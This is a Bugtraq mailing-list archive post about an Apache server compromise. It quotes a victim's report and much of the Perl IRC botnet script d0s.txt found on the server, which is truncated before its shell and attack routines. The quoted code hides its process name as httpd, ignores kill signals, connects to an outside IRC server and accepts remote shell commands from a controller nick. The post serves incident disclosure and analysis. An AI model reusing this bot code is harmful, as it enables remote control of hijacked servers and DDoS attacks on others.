Bugtraq mailing list archives

Re: Apache hacks (./atac, d0s.txt)

From: Daniel Cid <danielcid () yahoo com br>
Date: Sat, 30 Apr 2005 01:48:12 -0300 (ART)

Take a look at these links:

http://lists.virus.org/full-disclosure-0412/msg00541.html

http://seclists.org/lists/fulldisclosure/2005/Jan/0051.html

Are your systems patched (apache) ? Do you run any
application that might be vulnerable?

One thing I know is that this perl script is crearly
made by some brazilian people..

--
Daniel B. Cid, CISSP
daniel.cid @ ( at ) gmail.com

 --- Andrew Y Ng <ayn () AndrewNg com> escreveu:

My server has been seeing some usual activities
today, I don't have much time
to get down to the bottom of things, but after I
investigated briefly I have
decided to disable PERL executable permission for
www-data (Apache process's
user), also locked /var/tmp so www-data cannot write
to it. 

Looks like it ignores all the `kill` signals, not
sure how I can actually
kill it...


I found the included script in /var/tmp called
d0s.txt.

I found a bunch of processes called ./atac 20
running, and found the
following content in /tmp/atac:

http://andrewng.com/tmp/atac.tbz

here's d0s.txt:

#!/usr/bin/perl
################ CONFIGURACAO

#################################################################

my $processo = '/usr/local/apache/bin/httpd -DSSL'; 
# Nome do processo que vai aparece no ps       #

#----------------------------------------------################################################

my $MODOME='+pi';                               # 
Modo Do Bot                                 #

#----------------------------------------------################################################

my $linas_max='10';                            #
Evita o flood :) depois de X linhas          #

#----------------------------------------------################################################

my $sleep='3';                                 # ele
dorme X segundos                         #
##################### IRC

#####################################################################

my @adms=("DDOS");                           # Nick do
administrador                        #

#----------------------------------------------################################################

my @canais=("#bots ddos");# Canais                  
                    #

#----------------------------------------------################################################

my $nick='b0t';                           # Nick do
bot. Caso esteja em uso vai aparecer #
#                                              #
aparecer com numero radonamico no final      #

#----------------------------------------------################################################

my $ircname = 'b0t';                      # User ID 
                                    #

#----------------------------------------------################################################

my $realname = '4Admin14: 4#DDOS';     
                               #

#----------------------------------------------################################################

$servidor='irc.gigachat.net' unless $servidor; #
Servidor de irc que vai ser usado            #
#                                              #
caso não seja especificado no argumento      #

#----------------------------------------------################################################

my $porta='6667';                            # Porta do
servidor de irc                     #
################ ACESSO A SHELL

###############################################################

my $secv = 1;                                # 1/0
pra habilita/desabilita acesso a shell   #

###############################################################################################


my $VERSAO = '1.0';

$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';

use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);



our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();


$sel_cliente = IO::Select->new();
sub sendraw {
  if ($#_ == '1') {
    my $socket = $_[0];
    print $socket "$_[1]\n";
  } else {
      print $IRC_cur_socket "$_[0]\n";
  }
}

sub conectar {
   my $meunick = $_[0];
   my $servidor_con = $_[1];
   my $porta_con = $_[2];

   my $IRC_socket =
IO::Socket::INET->new(Proto=>"tcp",
PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or
return(1);
   if (defined($IRC_socket)) {
     $IRC_cur_socket = $IRC_socket;

     $IRC_socket->autoflush(1);
     $sel_cliente->add($IRC_socket);

     $irc_servers{$IRC_cur_socket}{'host'} =
"$servidor_con";
     $irc_servers{$IRC_cur_socket}{'porta'} =
"$porta_con";
     $irc_servers{$IRC_cur_socket}{'nick'} =
$meunick;
     $irc_servers{$IRC_cur_socket}{'meuip'} =
$IRC_socket->sockhost;
     nick("$meunick");
     sendraw("USER $ircname
".$IRC_socket->sockhost." $servidor_con
:$realname");
     sleep 1;
   }

}
my $line_temp;
while( 1 ) {
   while (!(keys(%irc_servers))) { conectar("$nick",
"$servidor", "$porta"); }
   delete($irc_servers{''}) if
(defined($irc_servers{''}));
   &DCC::connections;
   my @ready = $sel_cliente->can_read(0);
   next unless(@ready);
   foreach $fh (@ready) {
     $IRC_cur_socket = $fh;
     $meunick =
$irc_servers{$IRC_cur_socket}{'nick'};
     $nread = sysread($fh, $msg, 4096);
     if ($nread == 0) {
        $sel_cliente->remove($fh);
        $fh->close;
        delete($irc_servers{$fh});
     }
     @lines = split (/\n/, $msg);

     for(my $c=0; $c<= $#lines; $c++) {
       $line = $lines[$c];
       $line=$line_temp.$line if ($line_temp);
       $line_temp='';
       $line =~ s/\r$//;
       unless ($c == $#lines) {
         parse("$line");
       } else {
           if ($#lines == 0) {
             parse("$line");
           } elsif ($lines[$c] =~ /\r$/) {
               parse("$line");
           } elsif ($line =~ /^(\S+) NOTICE AUTH
:\*\*\*/) {
               parse("$line");
           } else {
               $line_temp = $line;
           }
       }
      }
   }
}


 
sub parse {
   my $servarg = shift;
   if ($servarg =~ /^PING \:(.*)/) {
     sendraw("PONG :$1");
   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)
PRIVMSG (.+?) \:(.+)/) {
       my $pn=$1; my $onde = $4; my $args = $5;
       if ($args =~ /^\001VERSION\001$/) {
         notice("$pn", "\001Bot powered by DDOS
TEAM\001");
       }
       if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
         if ($onde eq "$meunick"){
           shell("$pn", "$args");
         }
         if ($args =~ /^(\Q$meunick\E|\!bot)\s+(.*)/
) {

=== message truncated === 


        
        
                
Yahoo! Acesso Grátis - Internet rápida e grátis. 
Instale o discador agora! http://br.acesso.yahoo.com/

Current thread:

Re: Apache hacks (./atac, d0s.txt) a.list.address () gmail com (May 02)
- Re: Apache hacks (./atac, d0s.txt) Nick Bright (May 02)
- <Possible follow-ups>
- Re: Apache hacks (./atac, d0s.txt) Chris Umphress (May 02)
- Re: Apache hacks (./atac, d0s.txt) Sagiko (May 02)
- Re: Apache hacks (./atac, d0s.txt) Daniel Cid (May 02)
- Re: Apache hacks (./atac, d0s.txt) Luiz Henrique (May 02)
- Re: Apache hacks (./atac, d0s.txt) Skip Carter (May 02)
- Re: Apache hacks (./atac, d0s.txt) Robert Zilbauer (May 02)
- Re: Apache hacks (./atac, d0s.txt) KF (lists) (May 02)
- Re: Apache hacks (./atac, d0s.txt) Jay D. Dyson (May 02)
- Re: Apache hacks (./atac, d0s.txt) Steve Kemp (May 02)